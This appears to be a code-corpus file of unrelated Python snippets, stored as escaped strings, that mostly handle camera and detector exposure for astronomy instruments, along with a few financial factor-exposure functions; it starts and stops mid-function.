\"Bias\"]:\n\n ## Perform exposure\n self.logger.info(\"Starting {0}s {1} image.\".format(exptime, exptype))\n self.image_start.emit(1)\n\n try:\n filename = exposure.im_acq(mode, filepath, exptime, seqnum, **kwargs)\n self.image_taken.emit(1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken\".format(mode))\n except IOError:\n self.logger.exception(\"File already exits. Image not taken.\")\n else:\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.seqnum_inc.emit(seqnum)\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename,\n '-zoom', 'to', 'fit', '-cmap', 'b'])\n\n ## Check if a stack of exposures of same type\n elif exptype in [\"Exposure Stack\", \"Dark Stack\", \"Bias Stack\"]:\n\n total = seqnum + imcount\n self.logger.info(\"Starting {0}s {1} stack.\".format(exptime, exptype))\n self.image_start.emit(imcount)\n\n try:\n for i in range(seqnum, total):\n self.logger.info(\"Starting image {0} of {1}.\".format(i+1-seqnum, imcount))\n filename = exposure.im_acq(mode, filepath, exptime, i, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1-seqnum)\n self.seqnum_inc.emit(i)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. Image not taken.\")\n else:\n self.logger.info(\"Exposure stack finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n \n ## Check if a series of exposures of increase exposure time\n elif exptype in [\"Exposure Series\", \"Dark Series\"]:\n\n ## Parameter checks\n if mintime > maxtime:\n self.logger.warning(\"Minimum time must be less than Maximum time. Series not started.\")\n return\n elif step <= 0:\n self.logger.warning(\"Time step must be greater than 0. Series not started.\")\n return\n\n ## Construct array of exposure times\n t = mintime\n time_array = []\n while t <= maxtime:\n time_array.append(t)\n t += step\n \n ## Perform series\n self.logger.info(\"Starting {0} series with mintime {1}, maxtime {2}, and step {3}.\".format(exptype, mintime, maxtime, step))\n self.image_start.emit(len(time_array))\n \n try:\n for i, time in enumerate(time_array):\n self.logger.info(\"Starting {0}s {1} image.\".format(time, mode))\n filename = exposure.im_acq(mode, filepath, time, seqnum, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. Image not taken.\")\n else:\n self.logger.info(\"Exposure series finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n self.seqnum_inc.emit(seqnum)", "async def integrate(self, exposure_time=1):\n if not self.status == ControllerStatus.IDLE:\n raise ArchonError(\"Status must be IDLE to start integrating.\")\n\n await self.set_param(\"IntMS\", int(exposure_time * 1000))\n await self.set_param(\"Exposures\", 1)\n\n self.status = ControllerStatus.EXPOSING", "def __init__(self, exposure_time, img_acq_rate, EM_gain, name='iXon Ultra 897', img_acq_type='emcdd', darkfield=None, binning=None,\n vertical_pixel_shift_speed=0.5e-6, horizontal_pixel_shift_speed=0.1e-6, horizontal_pixel_shift_rate_bits=14,\n frame_transfer=True, crop_mode=False, acquisition_mode='kinetic', triggering='internal', readout_mode='image',\n pixels=512, pixel_size=16e-6):\n self.name = name\n self.img_acq_type = img_acq_type\n\n self.exposure_time = exposure_time\n self.img_acq_rate = img_acq_rate\n self.em_gain = EM_gain\n self.darkfield = darkfield\n self.binning = binning\n\n # supporting camera acquisition settings\n self.vpss = vertical_pixel_shift_speed\n self.hpss = horizontal_pixel_shift_speed\n self.hpss_bits = horizontal_pixel_shift_rate_bits\n self.frame_transfer = frame_transfer\n self.crop_mode = crop_mode\n self.acquisition_mode = acquisition_mode\n self.triggering = triggering\n self.readout_mode = readout_mode\n\n if isinstance(pixels, int):\n self.pixels = (pixels, pixels)\n else:\n self.pixels = pixels\n self.pixel_size = pixel_size\n self.image_area = (self.pixels[0]*pixel_size, self.pixels[1]*pixel_size)", "def factor_exposure(asset: Asset, risk_model_id: str, factor_name: str, *,\n source: str = None, real_time: bool = False, request_id: Optional[str] = None) -> pd.Series:\n risk_model = RiskModel(risk_model_id)\n factor = Factor(risk_model_id, factor_name)\n if factor.factor is None or risk_model_id != factor.risk_model_id:\n raise MqValueError('Requested factor not available in requested risk model')\n\n asset_gsid = asset.get_identifiers().get('GSID')\n\n # Establish date interval for data query\n dates = risk_model.get_dates()\n start_date = dt.datetime.strptime(min(dates), \"%Y-%m-%d\").date() if dates else None\n end_date = dt.datetime.strptime(max(dates), \"%Y-%m-%d\").date() if dates else None\n\n # Query data and append pull requested factor exposure\n all_exposures = []\n query_results = risk_model.get_data(\n measures=[Measure.Factor_Name, Measure.Universe_Factor_Exposure, Measure.Asset_Universe],\n start_date=start_date,\n end_date=end_date,\n assets=DataAssetsRequest(identifier=AssetUniverseIdentifier.gsid, universe=[asset_gsid])).get('results', [])\n for result in query_results:\n if result.get('date') in dates:\n exposures = result.get('assetData', {}).get('factorExposure', [])\n if exposures:\n all_exposures.append(\n {'date': result['date'],\n 'factorExposure': exposures[0].get(factor.factor.identifier)})\n\n # Create and return timeseries\n df = pd.DataFrame(all_exposures)\n df.set_index('date', inplace=True)\n df.index = pd.to_datetime(df.index)\n return _extract_series_from_df(df, QueryType.FACTOR_EXPOSURE)", "def wfits(self, filename=None):\n with self.lock:\n dark = self.dark\n if not filename:\n if dark != 0:\n filename = self.getNextFilename(\"dark\")\n else:\n filename = self.getNextFilename(\"object\")\n with self.lock:\n if(self.data.size == 0):\n raise FliError(\"No image available\")\n hdu = pyfits.PrimaryHDU(self.data)\n hdr = hdu.header\n with self.lock:\n hdr.set('DATE', self.timestamp, 'exposure begin date')\n hdr.set('INSTRUME', self.devname, 'this instrument')\n hdr.set('SERIAL', self.devsn, 'serial number')\n hdr.set('EXPTIME', self.exptime, 'exposure time (ms)')\n hdr.set('VBIN', self.vbin, 'vertical binning')\n hdr.set('HBIN', self.hbin, 'horizontal binning')\n hdr.set('CCD-TEMP', self.temp, 'CCD temperature')\n if dark != 0:\n hdr.set('SHUTTER', 'CLOSE', 'shutter status')\n else:\n hdr.set('SHUTTER', 'OPEN', 'shutter status')\n hdr.set('CCDAREA', '[%d:%d,%d:%d]' % self.expArea, 'image area')\n hdu.writeto(filename, overwrite=True, checksum=True)\n with self.lock:\n self.filename = filename", "def create_exposure(event_class,event_type,egy,cth):\n\n if isinstance(event_type,int):\n event_type = evtype_string[event_type]\n \n irf_factory=pyIrfLoader.IrfsFactory.instance()\n irf = irf_factory.create('%s::%s'%(event_class,event_type))\n\n irf.aeff().setPhiDependence(False)\n \n theta = np.degrees(np.arccos(cth))\n \n # Exposure Matrix\n # Dimensions are Etrue and incidence angle\n m = np.zeros((len(egy),len(cth)))\n\n for i, x in enumerate(egy):\n for j, y in enumerate(theta): \n m[i,j] = irf.aeff().value(10**x,y,0.0)\n\n return m", "def _generate_exposure(self, expstart, number):\n\n index_number = number - 1 # for zero indexing\n\n filename = '{:04d}_raw.fits'.format(number)\n\n exp_gen = ExposureGenerator(self.detector, self.grism, self.NSAMP,\n self.SAMPSEQ, self.SUBARRAY,\n self.planet, filename, expstart)\n\n if not self.spatial_scan:\n self.sample_rate = 1 * u.year # high number reverts to read times\n\n _, sample_mid_points, sample_durations, read_index = \\\n exp_gen._gen_scanning_sample_times(self.sample_rate)\n\n time_array = (sample_mid_points + expstart).to(u.day)\n\n if self.transmission_spectroscopy:\n star_norm_flux = self.generate_lightcurves(time_array)\n planet_depths = 1 - star_norm_flux\n else:\n planet_depths = None\n\n # x shifts - linear shift with exposure, second exposure shifted by\n # x_shifts, direct image and first exp will match.\n x_ref = self._try_index(self.x_ref, index_number)\n y_ref = self._try_index(self.y_ref, index_number)\n sky_background = self._try_index(self.sky_background, index_number)\n\n # X and Y Shifts\n x_ref += self.x_shifts * index_number\n y_ref += self.y_shifts * index_number\n x_jitter = self.x_jitter\n y_jitter = self.y_jitter\n\n if self._visit_trend:\n scale_factor = self._visit_trend.get_scale_factor(index_number)\n else:\n scale_factor = None\n\n if self.spatial_scan:\n exp_frame = exp_gen.scanning_frame(\n x_ref, y_ref, x_jitter, y_jitter,\n self.wl, self.stellar_flux, planet_depths,\n self.scan_speed, self.sample_rate, sample_mid_points,\n sample_durations, read_index, ssv_generator=self.ssv_gen,\n noise_mean=self.noise_mean, noise_std=self.noise_std,\n add_flat=self.add_flat, add_dark=self.add_dark,\n scale_factor=scale_factor, sky_background=sky_background,\n cosmic_rate=self.cosmic_rate,\n add_gain_variations=self.add_gain_variations,\n add_non_linear=self.add_non_linear,\n clip_values_det_limits=self.clip_values_det_limits,\n add_read_noise=self.add_read_noise,\n add_stellar_noise=self.add_stellar_noise,\n add_initial_bias=self.add_initial_bias,\n progress_bar=self.progess,\n threads=self.threads\n )\n else:\n exp_frame = exp_gen.staring_frame(\n x_ref, y_ref, x_jitter, y_jitter,\n self.wl, self.stellar_flux, planet_depths,\n sample_mid_points, sample_durations, read_index,\n noise_mean=self.noise_mean, noise_std=self.noise_std,\n add_flat=self.add_flat, add_dark=self.add_dark,\n scale_factor=scale_factor, sky_background=sky_background,\n cosmic_rate=self.cosmic_rate,\n add_gain_variations=self.add_gain_variations,\n add_non_linear=self.add_non_linear,\n clip_values_det_limits=self.clip_values_det_limits,\n add_read_noise=self.add_read_noise,\n add_stellar_noise=self.add_stellar_noise,\n add_initial_bias=self.add_initial_bias,\n progress_bar=self.progess,\n threads=self.threads\n )\n\n exp_frame.generate_fits(self.outdir, filename, ldcoeffs=self.ldcoeffs)\n\n return exp_frame", "def take_image(self, shutter='normal', exptime=0.0,\n readout=2.0, save_as=\"\", timeout=None):\n\n s = time.time()\n parameter_list = []\n readout_time = 5\n exptime_ms = 0\n\n print(self.opt.getParameter('TimeStamps'), 'timestamp')\n # 1. Set the shutter state\n shutter_return = self._set_shutter(shutter)\n if shutter_return:\n parameter_list += shutter_return\n else:\n return {'elaptime': time.time()-s,\n 'error': \"Error setting shutter state\"}\n\n # 2. Convert exposure time to ms`\n try:\n exptime_ms = int(float(exptime) * 1000)\n logger.info(\"Converting exposure time %(exptime)ss\"\n \" to %(exptime_ms)s\"\n \"milliseconds\", {'exptime': exptime,\n 'exptime_ms': exptime_ms})\n parameter_list.append(['ExposureTime', exptime_ms])\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Error setting exposure time\", exc_info=True)\n\n # 3. Set the readout speed\n logger.info(\"Setting readout speed to: %s\", readout)\n if readout not in self.AdcSpeed_States:\n logger.error(\"Readout speed '%s' is not valid\", readout)\n return {'elaptime': time.time()-s,\n 'error': \"%s not in AdcSpeed states\" % readout}\n parameter_list.append(['AdcSpeed', readout])\n\n # 4. Set parameters and get readout time\n try:\n logger.info(\"Sending configuration to camera\")\n readout_time = self._set_parameters(parameter_list)\n r = int(readout_time) / 1000\n logger.info(\"Expected readout time=%ss\", r)\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Error setting parameters\", exc_info=True)\n\n # 5. Set the timeout return for the camera\n if not timeout:\n timeout = int(int(readout_time) + exptime_ms + 10000)\n else:\n timeout = 10000000\n\n # 6. Get the exposure start time to use for the naming convention\n start_time = datetime.datetime.utcnow()\n self.lastExposed = start_time\n logger.info(\"Starting %(camPrefix)s exposure\",\n {'camPrefix': self.camPrefix})\n try:\n data = self.opt.readNFrames(N=1, timeout=timeout)[0][0]\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Unable to get camera data\", exc_info=True)\n return {'elaptime': -1*(time.time()-s),\n 'error': \"Failed to gather data from camera\",\n 'send_alert': True}\n\n logger.info(\"Readout completed\")\n logger.debug(\"Took: %s\", time.time() - s)\n\n if not save_as:\n start_exp_time = start_time.strftime(\"%Y%m%d_%H_%M_%S\")\n # Now make sure the utdate directory exists\n if not os.path.exists(os.path.join(self.outputDir,\n start_exp_time[:8])):\n logger.info(\"Making directory: %s\", os.path.join(self.outputDir,\n start_exp_time[:8]))\n\n os.mkdir(os.path.join(self.outputDir, start_exp_time[:8]))\n\n save_as = os.path.join(self.outputDir, start_exp_time[:8], self.camPrefix+start_exp_time+'.fits')\n\n try:\n datetimestr = start_time.isoformat()\n datestr, timestr = datetimestr.split('T')\n hdu = fits.PrimaryHDU(data, uint=False)\n hdu.scale('int16', bzero=32768)\n hdu.header.set(\"EXPTIME\", float(exptime), \"Exposure Time in seconds\")\n hdu.header.set(\"ADCSPEED\", readout, \"Readout speed in MHz\")\n hdu.header.set(\"TEMP\", self.opt.getParameter(\"SensorTemperatureReading\"),\n \"Detector temp in deg C\")\n hdu.header.set(\"GAIN_SET\", 2, \"Gain mode\")\n hdu.header.set(\"ADC\", 1, \"ADC Quality\")\n hdu.header.set(\"MODEL\", 22, \"Instrument Mode Number\")\n hdu.header.set(\"INTERFC\", \"USB\", \"Instrument Interface\")\n hdu.header.set(\"SNSR_NM\", \"E2V 2048 x 2048 (CCD 42-40)(B)\", \"Sensor Name\")\n hdu.header.set(\"SER_NO\", self.serialNumber, \"Serial Number\")\n hdu.header.set(\"TELESCOP\", self.telescope, \"Telescope ID\")\n hdu.header.set(\"GAIN\", self.gain, \"Gain\")\n hdu.header.set(\"CAM_NAME\", \"%s Cam\" % self.camPrefix.upper(), \"Camera Name\")\n hdu.header.set(\"INSTRUME\", \"SEDM-P60\", \"Camera Name\")\n hdu.header.set(\"UTC\", start_time.isoformat(), \"UT-Shutter Open\")\n hdu.header.set(\"END_SHUT\", datetime.datetime.utcnow().isoformat(), \"Shutter Close Time\")\n hdu.header.set(\"OBSDATE\", datestr, \"UT Start Date\")\n hdu.header.set(\"OBSTIME\", timestr, \"UT Start Time\")\n hdu.header.set(\"CRPIX1\", self.crpix1, \"Center X pixel\")\n hdu.header.set(\"CRPIX2\", self.crpix2, \"Center Y pixel\")\n hdu.header.set(\"CDELT1\", self.cdelt1, self.cdelt1_comment)\n hdu.header.set(\"CDELT2\", self.cdelt2, self.cdelt2_comment)\n hdu.header.set(\"CTYPE1\", self.ctype1)\n hdu.header.set(\"CTYPE2\", self.ctype2)\n hdu.writeto(save_as, output_verify=\"fix\", )\n logger.info(\"%s created\", save_as)\n if self.send_to_remote:\n ret = self.transfer.send(save_as)\n if 'data' in ret:\n save_as = ret['data']\n return {'elaptime': time.time()-s, 'data': save_as}\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Error writing data to disk\", exc_info=True)\n return {'elaptime': -1*(time.time()-s),\n 'error': 'Error writing file to disk:' % str(e)}", "def observeField(target, exposure):\n\n status = 2\n real_exposure = exposure + np.random.normal(0.0, 20.0)\n realSN2 = target['DESsn2'] + np.random.uniform(0.0, 1.0)\n\n return status, real_exposure, realSN2", "def select_exposure(self):\n exp1_selected = self.exp1_radio.isChecked()\n\n if self.recording_sequence:\n self.record_sequence() # stop current recording\n\n if exp1_selected: # then exp1\n ifi_ndx = self.exp1_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp1_select.currentIndex(), ifi_ndx)\n else:\n ifi_ndx = self.exp2_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp2_select.currentIndex(), ifi_ndx)\n\n temp = list(self.dpar.iwindow_toggle_save)\n self.dpar.iwindow_toggle_save = list(self.dpar.iwindow[0])\n self.dpar.iwindow[0] = temp\n self._update_scrollbars()\n\n self.rec_seq_button.setEnabled(ifi_ndx > 0)\n\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "def factor_exposure(report_id: str, factor_name: str, *, source: str = None,\n real_time: bool = False, request_id: Optional[str] = None) -> pd.Series:\n return _get_factor_data(report_id, factor_name, QueryType.FACTOR_EXPOSURE)", "def exposureCallback(self, config):\n rospy.loginfo('Set exposure: {}'.format(config['exposure']))", "def __exp1_changed_callback(self, ndx):\n if self.recording_sequence:\n self.record_sequence()\n self.exp1_radio.setChecked(True)\n self.exp1_ifi_select.setCurrentIndex(0)\n self.camera.set_exposure(ndx, 0)\n self.rec_seq_button.setEnabled(False)\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "async def expose(obj, exptime, outfile, overwrite):\n\n async with obj['camera_system'] as fli:\n\n log.debug('starting camera exposures ... ')\n exposures = await asyncio.gather(*[camera.expose(exptime)\n for camera in fli.cameras],\n return_exceptions=False)\n\n log.debug('writing images to disk ... ')\n writers = []\n for exposure in exposures:\n if outfile:\n outfile = outfile.format(camera=exposure.camera)\n writers.append(exposure.write(filename=outfile,\n overwrite=overwrite))\n else:\n writers.append(exposure.write(overwrite=overwrite))\n\n await asyncio.gather(*writers, return_exceptions=True)", "def ptc_acquisition(self, explow=0.1, exphigh=2, expdelta=0.1, laserchannel = 2, lasercurrent=45.0):\n\n #\n self.laser.select(laserchannel)\n self.laser.setCurrent(laserchannel, lasercurrent)\n self.laser.enable()\n\n #self.powerup_CCD()\n self.reb.set_testtype('PTC')\n\n #self.DKD.setup_current_measurements(DKD_range)\n self.PhD.setup_current_measurements(2e-8)\n\n # Create the logging summary file\n summaryfile = os.path.join(eodir, 'summary.log')\n f = open(summaryfile, 'a')\n\n print >>f, \"# power\\t exposure time\\t file name\"\n\n effpow = self.laser.getPower(laserchannel)\n # First take bias frames\n self.log(\"Taking bias\")\n m = self.execute_reb_sequence('ClearBias', 0, 20, True )\n #to have only useful channels:\n fname = \"%s_ptc_bias_%s.fits\" % (serno, self.reb.reb.imgtag)\n i = self.conv_to_fits(channels=validamps)\n # to save FITS HDU with headers\n self.save_to_fits(i, m, fitsname=os.path.join(eodir, fname))\n\n print >>f, effpow, 0, fname\n\n for t in np.arange(explow, exphigh+expdelta, expdelta):\n # pair of flats\n for numpair in [1, 2]:\n effpow = self.laser.getPower(laserchannel)\n m = self.execute_reb_sequence('Acquisition', t)\n #to have only useful channels:\n fname = \"%s_ptc_flat%d_%05d_%s.fits\" % (serno, numpair, int(t*100), self.reb.reb.imgtag)\n i = self.conv_to_fits(channels=validamps)\n # to save FITS HDU with headers\n self.save_to_fits(i, m, fitsname=os.path.join(eodir, fname))\n\n print >>f, effpow, t, fname\n\n f.close()\n\n # Shutting down (not the lamp by default)\n self.laser.disable()\n #self.shutdown_CCD()\n # p = self.reb.start_waiting_sequence()", "def configure_exposure(cam,exposure):\n\n #print(\"*** CONFIGURING EXPOSURE ***\\n\")\n\n try:\n result = True\n\n # Turn off automatic exposure mode\n #\n # *** NOTES ***\n # Automatic exposure prevents the manual configuration of exposure\n # times and needs to be turned off for this example. Enumerations\n # representing entry nodes have been added to QuickSpin. This allows\n # for the much easier setting of enumeration nodes to new values.\n #\n # The naming convention of QuickSpin enums is the name of the\n # enumeration node followed by an underscore and the symbolic of\n # the entry node. Selecting \"Off\" on the \"ExposureAuto\" node is\n # thus named \"ExposureAuto_Off\".\n #\n # *** LATER ***\n # Exposure time can be set automatically or manually as needed. This\n # example turns automatic exposure off to set it manually and back\n # on to return the camera to its default state.\n\n \n\n # Set exposure time manually; exposure time recorded in microseconds\n #\n # *** NOTES ***\n # Notice that the node is checked for availability and writability\n # prior to the setting of the node. In QuickSpin, availability and\n # writability are ensured by checking the access mode.\n #\n # Further, it is ensured that the desired exposure time does not exceed\n # the maximum. Exposure time is counted in microseconds - this can be\n # found out either by retrieving the unit with the GetUnit() method or\n # by checking SpinView.\n\n if cam.ExposureTime.GetAccessMode() != PySpin.RW:\n print(\"Unable to set exposure time. Aborting...\")\n return False\n\n # Ensure desired exposure time does not exceed the maximum\n exposure_time_to_set = exposure\n exposure_time_to_set = min(cam.ExposureTime.GetMax(), exposure_time_to_set)\n cam.ExposureTime.SetValue(exposure_time_to_set)\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n return result", "def __exp2_changed_callback(self, ndx):\n if self.recording_sequence:\n self.record_sequence()\n self.exp2_radio.setChecked(True)\n self.exp2_ifi_select.setCurrentIndex(0)\n self.camera.set_exposure(ndx, 0)\n self.rec_seq_button.setEnabled(False)\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "def exp_scan(self, exposure_time_list):\n self.generic_scan(self.exp, exposure_time_list)", "def get_exposure_value():\n validate(request.json, 'exposureValueRequestSchema', 'swagger/getExposureValue.yml')\n logging.info(\"get_exposure_value({0})\".format(request.json))\n return database.get_exposure_value(loc=request.json['loc'],\n stime=ExposureUtil.to_timestamp(request.json['stime']),\n etime=ExposureUtil.to_timestamp(request.json['etime']),\n tres=request.json['tres'],\n tstat=request.json['tstat'])", "def exptime(et=0.02):\n if et < 0.02:\n et = 0.02\n logger.error('Exposure time less than 0.02 seconds specified, using 0.02.')\n print camera.exptime(et)\n camera.status.update()", "def query_cmd(age, feh=0.0, visual_extinction=0.0, output_fname=None):\n\n cmd_url = 'http://stev.oapd.inaf.it/cgi-bin'\n age_str = '%.5f' % age.to_value('yr')\n feh_str = '%.5f' % feh\n response = requests.post(\n cmd_url + '/cmd',\n {\n 'cmd_version': '3.3',\n 'track_parsec': 'parsec_CAF09_v1.2S',\n 'track_colibri': 'parsec_CAF09_v1.2S_S35',\n 'track_postagb': 'no',\n 'n_inTPC': '10',\n 'eta_reimers': '0.2',\n 'kind_interp': '1',\n 'kind_postagb': '-1',\n 'photsys_file': 'tab_mag_odfnew/tab_mag_ubvrijhk.dat',\n 'photsys_version': 'YBC',\n 'dust_sourceM': 'dpmod60alox40',\n 'dust_sourceC': 'AMCSIC15',\n 'kind_mag': '2',\n 'kind_dust': '0',\n 'extinction_av': '%.3f' % visual_extinction,\n 'extinction_coeff': 'constant',\n 'extinction_curve': 'cardelli',\n 'imf_file': 'tab_imf/imf_kroupa_orig.dat',\n 'isoc_isagelog': '0',\n 'isoc_agelow': age_str,\n 'isoc_ageupp': age_str,\n 'isoc_dage': '0.0',\n 'isoc_dlage': '0.0',\n 'isoc_ismetlog': '1',\n 'isoc_zlow': '0.0152',\n 'isoc_zupp': '0.03',\n 'isoc_dz': '0.0',\n 'isoc_metlow': feh_str,\n 'isoc_metupp': feh_str,\n 'isoc_dmet': '0.0',\n 'output_kind': '0',\n 'output_evstage': '1',\n 'lf_maginf': '-15',\n 'lf_magsup': '20',\n 'lf_deltamag': '0.5',\n 'sim_mtot': '1.0e4',\n 'output_gzip': '0',\n 'submit_form': 'Submit',\n '.cgifields': ['photsys_version',\n 'isoc_ismetlog',\n 'dust_sourceC',\n 'isoc_isagelog',\n 'track_colibri',\n 'output_gzip',\n 'track_parsec',\n 'dust_sourceM',\n 'output_kind',\n 'extinction_coeff',\n 'track_postagb',\n 'extinction_curve']\n }\n )\n bs_response = BeautifulSoup(response.text, 'html.parser')\n downloaded = False\n for link in bs_response.find_all('a'):\n link_url = link.get('href')\n if link_url.endswith('.dat'):\n assert not downloaded\n data_url = '%s/%s' % (cmd_url, link_url)\n print('Downloading: ' + data_url)\n if output_fname:\n with open(output_fname, 'wb') as destination:\n destination.write(\n requests.get(data_url, allow_redirects=True).content\n )\n else:\n result = requests.get(data_url, allow_redirects=True).content\n print('Done')\n downloaded = True\n assert downloaded\n return result", "def test_exposure(self):\n lcname = os.path.join(self.datadir,\n 'monol_testA_E3-50_lc' + HEN_FILE_EXTENSION)\n ufname = os.path.join(self.datadir, 'monol_testA_uf.evt')\n command = \"{0} {1}\".format(lcname, ufname)\n\n hen.exposure.main(command.split())\n fname = os.path.join(self.datadir,\n 'monol_testA_E3-50_lccorr' + HEN_FILE_EXTENSION)\n assert os.path.exists(fname)\n ftype, contents = hen.io.get_file_type(fname)\n\n assert isinstance(contents, Lightcurve)\n assert hasattr(contents, 'expo')", "def exposure(self) -> Quantity:\n if self._exp is None:\n raise ModelNotAssociatedError(\"There are no XSPEC fits associated with this Spectrum\")\n else:\n exp = Quantity(self._exp, 's')\n\n return exp", "def exposuretime(self) -> ErrorValue:\n return ErrorValue(self._data['ExpTime'], self._data.setdefault('ExpTimeError',0.0))", "def command(self, value):\n global exposure_meter_mode_names\n for ii in range(0, len(exposure_meter_mode_names)):\n if value == exposure_meter_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMeterMode = ii\n self.tcp_comms.send_metering_mode(self.tcp_comms.tcp_params.exposureMeterMode)", "def capture_data(vx_handle, s_mode, s_channels, i_wait_count, t_timeout, b_show_status): #pylint: disable=R0913\n t_start = time.perf_counter()\n vx_handle.write('CAPTURESTART ONE, %s'%s_mode)\n i_bytes_captured = 0\n i_last_cap_byte = 0\n t_last = t_start\n while i_bytes_captured < (i_wait_count * 4 * len(s_channels)):\n i_bytes_captured = int(vx_handle.ask('CAPTUREBYTES?'))\n if b_show_status:\n show_status('dut has captured %4d of %4d samples'%\n (i_bytes_captured / (4 * len(s_channels)), i_wait_count))\n if (i_bytes_captured - i_last_cap_byte) == 0:\n if (time.perf_counter() - t_last) > t_timeout:\n print('\\n\\n**** CAPTURE TIMEOUT! ****')\n if not i_bytes_captured:\n print('**** NO DATA CAPTURED - missing trigger? ****\\n')\n sys.exit(-1)\n break\n else:\n t_last = time.perf_counter()\n i_last_cap_byte = i_bytes_captured\n t_end = time.perf_counter()\n vx_handle.write('CAPTURESTOP')\n print('capture took %.3f seconds. Retrieving data...'%(t_end-t_start))\n return i_bytes_captured", "def set_exposure(self, expo):\n if expo == 0:\n self.exposure = 0\n elif expo == 1:\n self.exposure = min(9, self.exposure+1)\n elif expo == -1:\n self.exposure = max(-9, self.exposure-1)\n self.drone.set_exposure(self.exposure)\n log.info(f\"EXPOSURE {self.exposure}\")", "def capture_image(self):\n ext = self.image_save_type.lower()\n\n if self.calibrating:\n print('calibrating')\n\n if ext == 'fits':\n self.save_fits()\n self._image_counter += 1\n else:\n img = self.original_image\n path = os.path.join(self.home, 'data')\n name = \"camtrak_frame_{}.png\".format(self._image_counter) \n fn = os.path.join(path, name)\n cv2.imwrite(fn, img)\n\n QtWidgets.QApplication.beep()\n self.statusBar().showMessage(f'Saved image to {fn}')\n self._image_counter += 1", "def get_exposure(self):\n exposure = float(self._driver.ExposureTime)\n\n return exposure", "def expose_test(self):\n with self.lock:\n self.dark = 1\n self.tstart = time.time()\n self.timestamp = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(self.tstart))\n imagesize = (self.expArea[3] - self.expArea[1],\n self.expArea[2] - self.expArea[0])\n self.data = np.ones(shape=imagesize, dtype=np.uint16)\n self.tend = time.time()", "def set_exposure_times(self, exposure_time=None, duration=None,\n start_time=None, mid_time=None, end_time=None):\n import time, datetime\n # Modified Julian date of the \"zero epoch\" of the time library (1/1/70)\n MJD_ZEROPOINT = 40587.0\n # Number of seconds per day.\n SECONDS_PER_DAY = 86400.0\n if hasattr(self, 'meta') and hasattr(self.meta, 'exposure'):\n if exposure_time is not None:\n self.meta.exposure.exposure_time = exposure_time\n if duration is not None:\n self.meta.exposure.duration = duration\n elif exposure_time is not None:\n self.meta.exposure.duration = exposure_time\n \n if start_time == 'NOW':\n start_time = MJD_ZEROPOINT + (time.time()/SECONDS_PER_DAY)\n if start_time is not None:\n self.meta.exposure.start_time = float(start_time)\n \n if mid_time == 'NOW':\n mid_time = MJD_ZEROPOINT + (time.time()/SECONDS_PER_DAY)\n if mid_time is not None:\n self.meta.exposure.mid_time = float(mid_time)\n \n if end_time == 'NOW':\n end_time = time.time()\n elif self.meta.exposure.start_time is not None and \\\n self.meta.exposure.duration is not None and end_time is None:\n # Set the end time to start_time + duration\n end_time = self.meta.exposure.start_time + \\\n (self.meta.exposure.duration/SECONDS_PER_DAY)\n if end_time is not None:\n self.meta.exposure.end_time = float(end_time)\n else:\n strg = \"Exposure metadata attributes missing from data model\"\n raise AttributeError(strg)", "def find_exposure_time(cam,targetIntensity=100,margin=5):\n from numpy import mean\n\n if targetIntensity < 0 or targetIntensity > 255:\n print(\"Invalid target intensity\")\n return 1\n minExposure = 0.01 # Smallest value in ms\n maxExposure = 80\n counter = 0\n\n # Calculate exposures at the different end\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(minExposure))\n minIntensity = mean(Image)\n\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(maxExposure))\n maxIntensity = mean(Image)\n\n midIntensity = 1\n while midIntensity < (targetIntensity - margin) or\\\n midIntensity > (targetIntensity+margin) and counter < 20:\n # Set exposure, take a picture and check how good it was\n counter = counter + 1\n\n midExposure = (maxExposure + minExposure) / 2\n Image = cam.grab_image(timeout='1s',\n copy=True,\n exposure_time=number_to_millisecond(midExposure))\n midIntensity = mean(Image)\n\n if midIntensity > targetIntensity: # Exposure time too short\n maxExposure = midExposure\n # maxIntensity = midIntensity\n else: # Exposure time too long\n minExposure = midExposure\n # minIntensity = midIntensity\n if counter == 100:\n print(\"WARNING: Find exposure function ran max number of iterations!\\\n No really suitable exposure setting found\")\n # Update the exposure time of the camera and return the target exposure\n cam.set_defaults(exposure_time=number_to_millisecond(midExposure))\n return midExposure#number_to_millisecond(midExposure)", "def tomoScanWithFrames(description, inBeamPosition, outOfBeamPosition, exposureTime=1., start=0., stop=180., step=0.1, darkFieldInterval=0, flatFieldInterval=0,\n imagesPerDark=10, imagesPerFlat=10, optimizeBeamInterval=0, pattern=\"default\", nframes=1, tomoRotationAxis=0, addNXEntry=True, autoAnalyse=True, additionalScannables=[]):\n 